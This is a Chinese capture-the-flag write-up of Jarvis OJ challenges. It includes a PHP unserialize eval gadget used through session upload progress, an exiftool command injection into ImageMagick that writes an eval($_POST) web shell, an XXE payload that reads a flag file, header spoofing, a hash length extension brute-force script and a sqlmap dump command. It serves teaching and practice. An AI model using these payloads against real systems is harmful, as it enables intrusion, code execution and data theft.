【web】jarvis oj 刷题

web?

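"""Solve the "web?" challenge: the flag's 25 character codes are the unknowns
of a 25x25 linear system whose coefficients and right-hand side are given
on the challenge page."""
import numpy as np


def decode_solution(values):
    """Turn the float solution vector into the flag string.

    Each unknown is a character code that comes out of floating-point
    elimination with rounding noise (e.g. 71.99999999999997).  Rounding to
    the nearest integer is the robust form of the original
    ``str(i)[0:-2]`` string-truncation trick, which only worked for values
    whose Python 2 ``str()`` ended in ``.0``.

    Args:
        values: iterable of numbers, one per character.
    Returns:
        The characters ``chr(round(v))`` joined together; ``""`` for empty input.
    Raises:
        ValueError: if a rounded value is outside chr()'s range.
    """
    return "".join(chr(int(round(float(v)))) for v in values)


# Coefficient matrix (25 rows x 25 columns) and right-hand side, copied
# verbatim from the challenge.
o = [
    [11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135],
    [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221],
    [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230],
    [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80],
    [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45],
    [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107],
    [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249],
    [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158],
    [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98],
    [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141],
    [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119],
    [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94],
    [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208],
    [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196],
    [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40],
    [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123],
    [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236],
    [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119],
    [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196],
    [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66],
    [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214],
    [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212],
    [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235],
    [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156],
    [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198],
]
r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259]

# Work in floating point explicitly; the original relied on numpy's implicit
# int -> float promotion inside solve().
o = np.array(o, dtype=float)
r = np.array(r, dtype=float)
# Raises numpy.linalg.LinAlgError if the matrix were singular.
x = np.linalg.solve(o, r)
print(x)
string = decode_solution(x)
print(string)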

phpinfo

反序列化漏洞,比较新的一点是利用了 PHP 文件上传过程中的 session(upload progress)来进行漏洞利用。

html构造如下

<!-- Multipart upload form from the writeup.  The hidden field is named
     PHP_SESSION_UPLOAD_PROGRESS, which is the default field name PHP's
     session.upload_progress feature watches: while the file is being
     received, PHP records progress data in the session.  The defensive
     knob is on the server side (session.upload_progress.enabled = 0 when
     the feature is not needed); the action URL is the challenge instance
     named elsewhere on this page. -->
<form action="http://web.jarvisoj.com:32784/phpinfo.php" method="POST" enctype="multipart/form-data">
<!-- Value "123" is arbitrary here; only the field's presence matters. -->
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>

几个payload

// Alternative values for the $mdzz property of the OowoO gadget shown
// further down (its __destruct() passes that string to eval()).  The first
// two list the script's directory, the third presumably prints the flag
// file found by the scandir() listing.
print_r(dirname(__FILE__));
print_r(scandir(dirname(__FILE__)));
print_r(file_get_contents("Here_1s_7he_fl4g_buT_You_Cannot_see.php"));
序列化payload

<?php
// Select the plain 'php' session serialize handler; the ini_set() must come
// before session_start() for the setting to take effect in this request.
ini_set('session.serialize_handler', 'php');
session_start();
// Gadget class whose serialized form is printed below.  Its destructor
// hands $mdzz straight to eval(), so whatever string is stored in that
// property runs as PHP when the object is destroyed.  This is the pattern
// that makes unserialize() of untrusted input dangerous; on the defending
// side, never unserialize attacker-controlled data, or restrict it with
// unserialize()'s allowed_classes option.
class OowoO
{
// PHP source text executed by __destruct().
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
// Instantiate the gadget, replace the default payload and print its
// serialized form.  The commented line is the exact output (s:27 is the
// byte length of the replaced string; it changes with the payload).
$m = new OowoO();
$m->mdzz = "print_r(dirname(__FILE__));";
echo serialize($m);
//O:5:"OowoO":1:{s:4:"mdzz";s:27:"print_r(dirname(__FILE__));";}
?>

ps:

参考资料
PHP Session 序列化及反序列化处理器 http://www.tuicool.com/articles/zEfuEz

upload

CVE 漏洞:imagick

exiftool -label="\"|/usr/bin/id; \"" imagick.png

shell

exiftool -label="\"|/bin/echo \<?php \@eval\(\\$\_POST\[a\]\)\;?\> > /opt/lampp/htdocs/uploads/1.php; \"" imagick.png

CTF{873dfee87823248f4a1657650204697a}

api

一开始一脸懵比。。。

原来是XXE攻击

payload一发带走

<?xml version="1.0" encoding="UTF-8" ?>
<!-- XXE payload from the writeup: the inline DTD declares an external
     entity backed by a local file, and the parser expands it where the
     entity is referenced inside <value>.  The fix belongs in the parser
     configuration: external entity and DTD resolution must be disabled
     for untrusted XML. -->
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

考点:文件包含漏洞

1、泄露源码

但是关键字符被waf挡住了。

上传图片马

uploads/1497485980.gif

还是被waf拦截了,使用<script>绕过

CTF{upl0ad_sh0uld_n07_b3_a110wed}

chopper

考察点:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

ssrf中ip.src的构建。

信息获取能力

robots.txt
.index.php.swp
.index.php.swo
index.txt
index.bak
index.php~
test.php
index.phps
phpinfo.php

在robots.txt中找到线索。在burp repeater中,change action method 使get变成post,成功执行。

CTF{fl4g_1s_my_c40d40_1s_n0t_y0urs}

flag在管理员手里

考察点:

信息获取能力

vim缓存文件恢复 vim -r index.php

哈希长度扩展攻击

可利用工具:

https://github.com/iagox86/hash_extender

exp如下

"""Hash-length-extension probe for the "flag在管理员手里" task (Python 2 code).

For each guessed secret length from 0 to 999 the external hash_extender
binary produces a forged (digest, data) pair; the pair is sent back in the
`hsh` and `role` cookies and any response whose body is not the usual
210 bytes is printed as a hit.  Needs ./hash_extender in the working
directory and the third-party `requests` package.  The underlying weakness
is a signature of the form md5(secret . data); an HMAC is not extendable
and is the standard fix.
"""
import requests,os,urllib
for x in range(1000):
# -d: known signed data, -s: its md5, -a: text to append, -l: guessed
# secret length (x).  -d and -a are written reversed, matching the
# [::-1] applied to the tool's output below.
cmd = './hash_extender -d ";\\"tseug\\":5:s" -s "3a4727d57463f122833d9e732f94e4e0" -a ";\\"nimda\\":5:s" -f md5 --out-data-format=html -q -l '+str(x)
# print cmd
# Shell invocation of a fixed command string; only str(x) varies.
p = os.popen(cmd).read()
# break
url = "http://web.jarvisoj.com:32778/"
# Cookie prefix copied from the browser session (tracking cookies,
# presumably irrelevant to the check).
payload = "__cfduid=d08f46c0f9fbc7e86bab05b2d091bb7c81496549709; UM_distinctid=15c715066e3a8a-0f985be0b8ac06-5393662-1fa400-15c715066e4104b; "
# First 32 chars of the tool's output are the new hex digest.
payload += "hsh="+p[:32]+";"
# Remainder is the forged data: url-decode, reverse, re-encode.
payload +="role="+urllib.quote(urllib.unquote(p[32:])[::-1])+";"
# print payload
# break
head = {"Cookie":payload}
data = requests.get(url=url,headers=head).content
# 210 bytes is the length of the normal (rejected) page; anything else
# is worth looking at.
if len(data) != 210:
print data

参考资料:

https://ricterz.me/posts/%E5%93%88%E5%B8%8C%E9%95%BF%E5%BA%A6%E6%89%A9%E5%B1%95%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90

RE

逆向思路。。gdb调试一波,拿到flag。。。

#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
/* Path of the shared object loaded at run time. */
#define LIB_CACULATE_PATH "./udf.so"
/* Type of the symbol looked up below: no declared parameters, returns int. */
typedef int (*CAC_FUNC)();

/*
 * Load LIB_CACULATE_PATH with dlopen(), resolve the "getflag" symbol, call
 * it once and unload the library.  A dlopen() or dlsym() failure prints the
 * dlerror() text on stderr and ends the process with EXIT_FAILURE; otherwise
 * the process ends with EXIT_SUCCESS.
 */
int main(void)
{
    void *lib = dlopen(LIB_CACULATE_PATH, RTLD_LAZY);
    if (lib == NULL) {
        fprintf(stderr, "%s\n", dlerror());
        return EXIT_FAILURE;
    }

    /* Clear any stale error so that the check after dlsym() is meaningful. */
    dlerror();

    CAC_FUNC getflag = NULL;
    /* Storing the void* from dlsym() into a function pointer through a
     * void** is the idiom given in the dlsym(3) manual page. */
    *(void **)(&getflag) = dlsym(lib, "getflag");
    const char *err = dlerror();
    if (err != NULL) {
        fprintf(stderr, "%s\n", err);
        return EXIT_FAILURE;
    }

    getflag();
    dlclose(lib);
    return EXIT_SUCCESS;
}
gcc -rdynamic -o main main.c -ldl

simple injection

sqlmap -u "http://web.jarvisoj.com:32787/login.php" --data "username=123&password=123" --tamper=space2comment -D injection --dump
